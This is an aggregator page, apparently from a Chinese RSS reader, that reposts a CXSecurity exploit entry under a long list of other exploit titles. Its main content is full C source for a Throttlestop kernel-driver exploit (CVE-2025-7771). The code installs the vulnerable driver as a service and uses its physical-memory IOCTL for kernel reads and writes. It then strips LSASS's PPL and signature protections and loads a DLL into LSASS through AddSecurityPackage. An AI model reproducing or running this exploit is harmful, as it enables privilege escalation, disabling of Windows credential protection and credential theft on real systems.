惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Spread Privacy
Spread Privacy
P
Palo Alto Networks Blog
P
Proofpoint News Feed
AI
AI
Help Net Security
Help Net Security
S
Securelist
T
Troy Hunt's Blog
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
C
Cisco Blogs
Scott Helme
Scott Helme
Hacker News - Newest:
Hacker News - Newest: "LLM"
Vercel News
Vercel News
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
B
Blog
GbyAI
GbyAI
Recent Commits to openclaw:main
Recent Commits to openclaw:main
D
Darknet – Hacking Tools, Hacker News & Cyber Security
P
Proofpoint News Feed
S
Security Affairs
Cisco Talos Blog
Cisco Talos Blog
AWS News Blog
AWS News Blog
T
Tenable Blog
H
Help Net Security
NISL@THU
NISL@THU
F
Fortinet All Blogs
博客园_首页
G
GRAHAM CLULEY
L
LINUX DO - 最新话题
P
Privacy International News Feed
G
Google Developers Blog
博客园 - Franky
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Security Archives - TechRepublic
Security Archives - TechRepublic
The Register - Security
The Register - Security
L
LangChain Blog
aimingoo的专栏
aimingoo的专栏
T
Tor Project blog
P
Privacy & Cybersecurity Law Blog
量子位
C
Cyber Attacks, Cyber Crime and Cyber Security
Forbes - Security
Forbes - Security
S
Secure Thoughts
Simon Willison's Weblog
Simon Willison's Weblog
D
Docker
Recorded Future
Recorded Future
博客园 - 三生石上(FineUI控件)
L
Lohrmann on Cybersecurity
T
Tailwind CSS Blog

CXSECURITY Database RSS Feed - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution Frigate NVR 0.16.3 Remote Code Execution Linux nf_tables 6.19.3 Local Privilege Escalation ThingsBoard IoT Platform 4.2.0 Server-Side Request Forgery (SSRF) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500 / CVE-2026-46300) SUSE Manager 4.3.15 Code Execution Apache HertzBeat 1.8.0 Remote Code Execution JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution NiceGUI 3.6.1 Path Traversal - CXSecurity.com GUnet OpenEclass E-learning platform < 4.2 Remote Code Execution (RCE) Windows Snipping Tool NTLMv2 Hash Hijack telnetd 2.7 Buffer Overflow - CXSecurity.com Kukurigu LPE - Linux Kernel Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Event Booking Calendar-5.0 Cross-site scripting (reflected) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Ninja Forms Uploads Unauthenticated PHP File Upload Traccar GPS Tracking System 6.11.1 Cross-Site WebSocket Hijacking (CSWSH) Erugo 0.2.14 Remote Code Execution (RCE) Linux Kernel Local Privilege Escalation via Memory Handling and Access Control Weakness Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) Linux Kernel proc_readdir_de() 6.18-rc5 Local Privilege Escalation Insecure Permissions vulnerability in Nagios Network Analyzer v.2024R1.02-64 and before allows a local attacker to escalate privileges via the remove_source.sh component. Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation solaredge-CSRF-OOB-Injection - CXSecurity.com Trojan-Spy.Win32.Small / Remote Command Execution OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Critical Remote Code Execution Vulnerability in Windows Internet Key Exchange (IKE) Service (CVE-2026-33824) WordPress Madara Local File Inclusion FortiWeb 8.0.2 Remote Code Execution Easy File Sharing Web Server v7.2 Buffer Overflow NetBT e-Fatura Privilege Escalation - CXSecurity.com Docker Desktop 4.44.3 Unauthenticated API Exposure MaNGOSWebV4 4.0.6 Reflected XSS - CXSecurity.com Grafana 11.6.0 SSRF - CXSecurity.com OctoPrint 1.11.2 File Upload - CXSecurity.com esm-dev 136 Path Traversal - CXSecurity.com Linux Kernel mseal Invariant Violation (Linux kernel 6.17-7.0 rc5) astrojs/vercel <= 10.0.0 - Unauthenticated x-astro-path Header Path Override Microsoft SQL Server Privilege Elevation Through FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Wavlink WL-WN579X3-C firewall.cgi UPNP Stack-based Buffer Overflow esiclivre 0.2.2 SQL Injection - CXSecurity.com Payara Server Cross Site Scripting esiclivre 0.2.2 SQL Injection - CXSecurity.com SiYuan <= v3.6.1 Note unauthenticated arbitrary file read (path traversal) Tenda AC21 V1.0 V16.03.08.16 - Stack Buffer Overflow in SetNetControlList WWBN AVideo <= 26.0 - Authenticated SQL Injection Windows RRAS Remote Code Execution Vulnerability (CVE-2026-26111) - SE-RCE Exploit Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation Exploit Discourse <= 2026.2.1 Authenticated Missing Authorization Kanboard <= 1.2.50 Authenticated SQL Injection Glances <= 4.5.2 OS Command Injection via Mustache Template Fields LB-LINK BL-WR9000 V2.4.9 - Stack-based Buffer Overflow in /goform/get_hidessid_cfg LB-LINK BL-WR9000 V2.4.9 - Unauthenticated / Post-Auth Stack-based Buffer Overflow zumba/json-serializer zumba/json-serializer < 3.2.3 RCE Wekan 8.31.0 - 8.33Meteor DDP notificationUsers Sensitive Data Leak Splunk Remote Command Execution via Improper Input Validation Microsoft Windows MSHTML Security Feature Bypass Vulnerability Qualcomm GPU Driver Memory Corruption Vulnerability in Android Devices Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQL Injection PyJWT < 2.12.0 crit header bypass / Insufficient crit validation PluckCMS 4.7.10 Unrestricted File Upload Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486) WeGIA <= 3.6.4 Unauthenticated Admin Authentication Bypass NocoDB <= 0.301.2 User Enumeration via Password Reset Endpoint Craft CMS 4.x & 5.x RCE via Blocklist Bypass pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT AirPlay Dual‑Mode Discovery Scanner for Flipper Zero ESP32 WiFi Dev Board WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection WordPress Backup Migration 1.3.7 Remote Command Execution WeGIA 3.5.0 SQL Injection - CXSecurity.com
Throttlestop Kernel Driver Kernel Out-of-Bounds Write Privilege Escalation
Xavi Beltran · 2026-04-23 · via CXSECURITY Database RSS Feed - CXSecurity.com

Throttlestop Kernel Driver Kernel Out-of-Bounds Write Privilege Escalation

# Exploit Title: Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation # Exploit Details: https://xavibel.com/2025/12/22/using-vulnerable-drivers-in-red-team-exercises/ # Date: 8/12/2025 # Exploit Author: Xavi Beltran # Vendor Homepage: https://www.techpowerup.com/download/techpowerup-throttlestop/ # Version: 3.0.0.0 # Tested on: Windows 11 # CVE-2025-7771 #define WIN32_NO_STATUS #define SECURITY_WIN32 #include <Windows.h> #include <Psapi.h> #include <superfetch/superfetch.h> #include <tlhelp32.h> #include <string> #include <sspi.h> # define IOCTL_MMMAPIOSPACE 0x8000645C #pragma comment(lib, "Secur32.lib") #pragma pack(push,1) typedef struct { ULONGLONG PhysicalAddress; // +0 DWORD NumberOfBytes; // +8 } PHYS_REQ; // 0x0C #pragma pack(pop) // Struct needed to call nt!NtQueryIntervalProfile typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval); LPVOID GetBaseAddr(LPCWSTR drvname) { LPVOID drivers[1024]; DWORD cbNeeded; int nDrivers, i = 0; if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { WCHAR szDrivers[1024]; nDrivers = cbNeeded / sizeof(drivers[0]); for (i = 0; i < nDrivers; i++) { if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) { if (wcscmp(szDrivers, drvname) == 0) { return drivers[i]; } } } } return 0; } uint64_t xRead(HANDLE hDrv, uint64_t virt_addr) { auto mm = spf::memory_map::current(); if (!mm) { printf("[!] Superfetch init failed!\n"); return 0; } auto phys = mm->translate((void*)virt_addr); if (!phys) { printf("[!] Translate failed for VA %p!\n", (void*)virt_addr); return 0; } //printf("[+] Virtual Adress=0x%016llx -> Physical Address 0x%016llx\n", virt_addr, phys); // --- PHYSICAL READ --- PHYS_REQ in{}; in.PhysicalAddress = phys; in.NumberOfBytes = 0x8; ULONGLONG out = 0; DWORD br = 0; BOOL ok = DeviceIoControl(hDrv, IOCTL_MMMAPIOSPACE, &in, sizeof(in), // 0x0C &out, sizeof(out), // Accepts 4 or 8 &br, nullptr); //printf("[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\n", ok, br, GetLastError(), (unsigned long long)out); if (ok && br == 8 && out) { ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; // 8 bytes exactos printf("[+] READ WHERE: 0x%016llx | CONTENT: 0x%016llx\n", (unsigned long long)virt_addr, (unsigned long long)result); return result; } return -1; } uint64_t xWrite(HANDLE hDrv, uint64_t where, uint64_t what) { auto mm = spf::memory_map::current(); if (!mm) { printf("[!] Superfetch init failed!\n"); return 0; } auto phys = mm->translate((void*)where); if (!phys) { printf("[!] Translate failed for VA %p!\n", (void*)where); return 0; } //printf("[+] Virtual Adress=0x%016llx -> Physical Address 0x%016llx\n", where, phys); PHYS_REQ in{}; in.PhysicalAddress = phys; in.NumberOfBytes = 0x8; ULONGLONG out = 0; DWORD br = 0; BOOL ok = DeviceIoControl(hDrv, IOCTL_MMMAPIOSPACE, &in, sizeof(in), // 0x0C &out, sizeof(out), // 8 (Accepts 4 or 8) &br, nullptr); //printf("[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\n", ok, br, GetLastError(), (unsigned long long)out); if (ok && br == 8 && out) { ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; // 8 bytes exactos } // WRITE printf("[+] WRITE WHAT: 0x%016llx | WHERE: 0x%016llx\n", (unsigned long long)what, (unsigned long long)where); *(uint64_t*)out = what; return 0; } DWORD FindProcessId(const std::wstring& processName) { DWORD processId = 0; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snapshot == INVALID_HANDLE_VALUE) return 0; PROCESSENTRY32W entry; entry.dwSize = sizeof(PROCESSENTRY32W); if (Process32FirstW(snapshot, &entry)) { do { if (!_wcsicmp(entry.szExeFile, processName.c_str())) { processId = entry.th32ProcessID; break; } } while (Process32NextW(snapshot, &entry)); } CloseHandle(snapshot); return processId; } int main() { DWORD lsassPid = FindProcessId(L"lsass.exe"); printf("[+] Target process PID: %d\n", lsassPid); //Installing the service SC_HANDLE hSCManager; SC_HANDLE hService; // Open the Service Control Manager hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); if (hSCManager == NULL) { printf("[!] Error opening SCM: %lu\n", GetLastError()); return 1; } // Create the service hService = CreateService( hSCManager, L"ThrottleStop", L"ThrottleStop", SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, L"C:\\Users\\Public\\a.sys", NULL, NULL, NULL, NULL, NULL); if (hService == NULL) { printf("[+] Error creating service: %lu\n", GetLastError()); CloseServiceHandle(hSCManager); //return 1; } printf("[!] Service created successfully.\n"); if (!StartService(hService, 0, NULL)) { printf("[!] Error starting the service: %lu\n", GetLastError()); } else { printf("[+] Service started correctly.\n"); } LPVOID nt_base = GetBaseAddr(L"ntoskrnl.exe"); printf("[+] NT base: %p\n", nt_base); HANDLE hDrv = NULL; hDrv = CreateFileA("\\\\.\\ThrottleStop", (GENERIC_READ | GENERIC_WRITE), 0x00, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDrv == INVALID_HANDLE_VALUE) { printf("[-] Failed to get a handle on driver!\n"); return -1; } else { printf("[+] Handle on driver received!\n"); } ULONGLONG result = 0x0; // nt!PsInitialSystemProcess nt + 0x5412e0 ULONGLONG system_eprocess = ULONGLONG(nt_base) + 0x5412e0; DWORD64 Eprocess = xRead(hDrv, (uint64_t)system_eprocess); printf("[+] EPROCESS: 0x%llX\n", Eprocess); DWORD64 CurrentProcessPid = xRead(hDrv, (uint64_t)system_eprocess + 0x2e0); // +0x2e0 UniqueProcessId : Ptr64 Void DWORD64 SearchProcessPid = 0; DWORD64 searchEprocess = Eprocess; while (1) { searchEprocess = xRead(hDrv, (uint64_t)searchEprocess + 0x2e8) - 0x2e8; // +0x2e8 ActiveProcessLinks : _LIST_ENTRY SearchProcessPid = xRead(hDrv, (uint64_t)searchEprocess + 0x2e0); // +0x2e0 UniqueProcessId : Ptr64 Void if (SearchProcessPid == lsassPid) // LSASS PROCESS { break; } } printf("[+] Found LSASS EPROCESS!\n"); printf("[+] Removing PPL Protection...\n"); xWrite(hDrv, (uint64_t)searchEprocess + 0x6ca, 0x0); // +0x6ca Protection : _PS_PROTECTION printf("[+] Removing Signature Level Protection...\n"); xWrite(hDrv, (uint64_t)searchEprocess + 0x6c8, 0x0);// +0x6c8 Protection : SignatureLevel : UChar printf("[+] LSASS protections disabled\n"); CloseHandle(hDrv); SECURITY_PACKAGE_OPTIONS spo = {}; SECURITY_STATUS ss = AddSecurityPackageA((LPSTR)"c:\\windows\\system32\\ntssp.dll", &spo); printf("[+] DLL Injection successful!\n"); return 0; }



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}